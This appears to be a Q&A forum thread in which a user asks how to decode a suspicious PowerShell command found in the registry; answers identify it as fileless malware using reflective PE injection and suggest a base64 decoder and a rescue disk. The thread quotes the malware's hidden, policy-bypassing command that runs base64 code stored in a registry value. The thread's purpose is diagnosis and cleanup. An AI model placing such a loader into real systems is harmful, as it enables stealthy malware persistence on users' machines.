# How can i read the source code of this encoded powershell script from the registry?

Tags: encryption, virus, source-code, decryption, encoding

I get this line by ***ProcessExplorer***

> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile
>   -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp
>   'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

Now i'm sure that can be an encoded virus when i read this from the registry :

> Google Update    REG_SZ
>   "C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe" /c
>       {BE9473EA-5660-4BF7-91C3-2A2258213EE1}    REG_SZ    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile
>   -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp
>   'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

So, i exported the data value `LOOTDA` from the registry and i copy it as text file and i upload 
it **[here](http://www.filedropper.com/lootdavirus)**

So, i'm looking for any expert in encryption and decryption to decode and decrypt this kind of virus in order to read its source code and what it could be a harmful for us !

Thank you !

Comment: Could you please use at least a pastebin instead of a rar file?

Comment: The original LOOTDA_VIRUS.txt inside the RAR is too big for pastebin.  I base64 decoded it to get this: http://pastebin.com/y4r9JxNW
It's still obfuscated but it's a start.

Comment: @JohannesKuhn as he said mittmemo the file is to big to paste it on pastebin !

Answer (score 3, accepted):

This malware tries to avoid using files and processes by having the payload reside in the registry and using the **PowerSploit** methods to load code directly into memory via PowerShell commands. The **Invoke-ReflectivePEInjection** gives it away. It belongs to the **Terkop** malware family.

Comment: Thanks for the explanation ! Now what can i do to get rid it from the registry ? because i tried to delete it from the registry , but strangely, I can not delete the key or renaming it, or the class while I'm adminstrator
really strange ???
Remove ZXWNMNLIMAGAL impossible error during the deletion of the key.

Comment: I can't make specific recommendations. Use an antivirus rescue disk to boot and scan from it. It is safer to reinstall from scratch.

Answer (score 1):

You do not need

> any expert in encryption and decryption

You need a base64 decoder, like [this one](https://www.base64decode.org/).